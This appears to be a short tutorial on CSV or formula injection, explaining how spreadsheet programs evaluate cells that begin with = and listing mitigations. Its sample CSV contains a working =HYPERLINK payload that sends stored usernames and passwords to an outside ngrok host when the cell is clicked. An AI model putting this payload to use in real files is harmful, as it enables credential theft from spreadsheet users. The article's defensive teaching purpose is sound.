CSV Injection / Formula Injection



A comma-separated values (CSV) file is a plain text file, and data in CSV can be viewed in tabular form. Each row of CSV is one record, and each comma-separated value in the record is a field.

Web applications use CSV more commonly for export/import data. It may contain any text data. E.g., Google Contact allows the user to export and import contacts in CSV form.

Many business applications take data in CSV format and export it into the same. Sometimes, to use third-party services requires data in CSV format, as it is a common file type.

  • If we open CSV in notepad or any plain text editor, data will be displayed in comma separated form.
  • If we open CSV in Microsoft Office Excel, Open Office, Libre Office Calc or any other spreadsheet program, data will be displayed in tabular form. That data can be further used for Data Analysis, Calculations, Visualizations.

Any field starting with = will be considered as formula by spreadsheet programs.


Consider, simple CSV file

Name, Username, Password
Rahul, 1913104, Rahul@234
Varun, 1913108, Varun$456
=HYPERLINK(JOIN("_","http://b975195b.ngrok.io/?data=",B2,C2,B3,C3),"Click for details"), hacker, hacker

In the google spreadsheet, It will look like this.

When the authorized person clicks on that malicious cell, it will send username passwords to the attacker.


  • May allows remote attackers to execute arbitrary commands.
  • The attack can read the content of the same spreadsheet or another open spreadsheet.


  • Before processing CSV, ensure that no cell in CSV is starting with,
    • Equals (=)
    • Plus (+)
    • Minus (-)
    • At (@)
  • Never ignore security warnings given by spreadsheet programs.
  • Update the spreadsheet program whenever available.